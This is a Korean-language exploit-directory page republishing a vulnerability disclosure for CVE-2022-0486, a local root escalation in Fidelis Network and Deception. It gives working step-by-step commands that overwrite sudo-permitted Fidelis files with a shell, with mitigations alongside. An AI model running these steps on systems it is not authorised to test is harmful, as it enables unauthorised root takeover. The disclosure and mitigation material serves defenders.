Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - 안전하지 않은 파일 권한 상승 - 다중 | Kitploit
도구/GitHubGitHub/henryreed/cve-2022-0486
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - 안전하지 않은 파일 권한 상승 - 다중

저장소 보기
4년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Fidelis Network 및 Deception - CVE-2022-0486 - 안전하지 않은 파일 권한 권한 상승 - 다중

공개 가능성 및 감사의 말

모든 익스플로잇은 미국 정부에 의해 공개 승인되었습니다. 무제한 배포를 위해 문서 승인을 담당한 군인 및 정부 연락관에게 특별히 감사드립니다. 다음 OTR 번호를 참조하십시오:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

메타데이터

Date: 20220517 2005H UTC

Exploit Author: Henry Reed, The Aerospace Corporation

Vendor Homepage: https://fidelissecurity.com/

영향받는 버전:

  • Fidelis CommandPost 9.4.5 이전
  • Fidelis Collector 9.4.5 이전
  • Fidelis Sensor 9.4.5 이전
  • Fidelis Sandbox 9.4.5 이전

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

CVE: CVE-2022-0486

CVE 설명: Fidelis Network 및 Deception의 CommandPost, Collector, Sensor 및 Sandbox 구성 요소의 부적절한 파일 권한으로 인해 CLI에 대한 로컬 관리자 액세스 권한이 있는 공격자가 영향을 받는 파일을 수정하고 루트 사용자와 동등한 권한 상승을 가능하게 합니다. 이 취약점은 9.4.5 이전의 Fidelis Network 및 Deception 버전에 존재합니다. 이 취약점을 해결하기 위해 패치 및 업데이트를 사용할 수 있습니다.

핵심 요약

이 CVE는 일련의 부적절한 파일 권한을 포함하므로 여러 익스플로잇이 존재합니다. 모든 익스플로잇은 fidelis 사용자가 소유한 바이너리 또는 스크립트에 대해 fidelis 사용자에게 하나의 NOPASSWD 및 여러 개의 비밀번호 필요 sudoers 권한이 부여되어 fidelis 사용자가 파일을 임의로 수정할 수 있기 때문에 발생합니다. 이로 인해 로컬 권한 상승이 가능합니다.

NOPASSWD로 영향을 받는 파일:

  • /FSS/bin/shutdown.pl

비밀번호가 필요한 영향받는 파일:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

영향을 받는 Fidelis Deception 또는 Fidelis Network 사용자는 이 취약점을 패치하기 위해 소프트웨어를 업데이트하는 것이 좋습니다. 또한 이 취약점의 영향을 받는지 여부와 관계없이 모든 사용자는 초기 구성 후 Fidelis 제품에 대한 셸 액세스를 비활성화하는 것이 좋습니다.

어떤 이유로든 이 중 하나라도 불가능한 경우, 이 문서에는 각 취약한 파일에 대한 완화 방법이 설명되어 있습니다. 작성자의 테스트 범위 내에서는 사용자가 설명된 완화 방법을 적용하기 전에 이러한 취약점 중 하나를 사용하여 권한을 상승시켜야 하는 것으로 보이므로, 대신 Fidelis를 업데이트하고 SSH를 비활성화하는 것을 강력히 권장합니다.

Shutdown.pl 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/bin/shutdown.pl에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 묻지 않고 루트 사용자로 /FSS/bin/shutdown.pl을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 스크립트를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. shutdown.pl 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. sudo 명령을 사용하여 파일 실행:
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

취약점 발견 및 익스플로잇을 보여주는 스크린샷. NOPASSWD 라인은 shutdown.pl이 권한 상승의 잠재적 후보임을 나타냅니다:

완화 방법:

/FSS/bin/shutdown.pl의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/bin/shutdown.pl의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

cert_mgmt 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/setup/cert_mgmt에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/setup/cert_mgmt을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 스크립트를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. cert_mgmt 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/setup/cert_mgmt의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/setup/cert_mgmt의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

db_updater 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3

요약:

/FSS/bin/db_updater에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 Fidelis CommandPost에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/bin/db_updater을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 바이너리를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. db_updater 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/bin/db_updater

완화 방법:

/FSS/bin/db_updater의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/bin/db_updater의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

deception-manager 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3

요약:

/FSS/deception-manager/bin/deception-manager에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 Fidelis CommandPost에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/deception-manager/bin/deception-manager을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 바이너리를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/deception-manager/bin/deception-manager의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/deception-manager/bin/deception-manager의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

fssdbg.sh 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/sbin/fssdbg.sh에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/sbin/fssdbg.sh을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 스크립트를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. fssdbg.sh 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/sbin/fssdbg.sh의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/sbin/fssdbg.sh의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

mst 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/bin/mst에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/bin/mst을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 바이너리를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. mst 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/bin/mst

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/bin/mst의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/bin/mst의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다. 다음은 권한 상승 완화 및 fidelis가 sudo 없이 mst 명령을 실행할 때의 출력 스니펫을 보여주는 스크린샷입니다:

완화하더라도 fidelis 사용자가 sudo로 명령을 계속 실행할 수 있음을 보여주는 스크린샷:

완화가 사용될 때 mst를 수정하여 다른 임의 코드를 실행할 수 없음을 보여주는 스크린샷:

setup 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/bin/setup에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/bin/setup을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 바이너리를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. setup 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/bin/setup

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/bin/setup의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/bin/setup의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

setup 인증된 권한 상승

테스트 환경:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

요약:

/FSS/setup/unlock_cp_user.sh에 대한 잘못 구성된 소유권 권한으로 인해 fidelis 사용자가 여러 Fidelis 제품에서 루트 사용자와 동등한 권한으로 상승할 수 있습니다. 기본적으로 sudoers 구성은 fidelis 사용자가 비밀번호를 제공하면 루트 사용자로 /FSS/setup/unlock_cp_user.sh을 실행하도록 허용합니다. 이 파일은 fidelis 사용자가 소유하므로 fidelis 사용자가 스크립트를 임의로 수정하고 권한을 상승시킬 수 있습니다.

익스플로잇:

  1. unlock_cp_user.sh 파일 수정을 허용하도록 권한 변경:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. 임의 코드를 실행하거나, 이 예에서는 셸을 생성하도록 파일을 필요에 따라 변경:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. sudo 명령을 사용하여 파일을 실행하고 fidelis 사용자 비밀번호로 인증:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

취약점 발견 및 익스플로잇을 보여주는 스크린샷:

완화 방법:

/FSS/setup/unlock_cp_user.sh의 사용자 및 그룹 소유자를 root:fidelis로 변경하고 /FSS/setup/unlock_cp_user.sh의 그룹 소유자에게 읽기 및 실행 권한만 허용하면 이 취약점이 완화됩니다:

도구 다운로드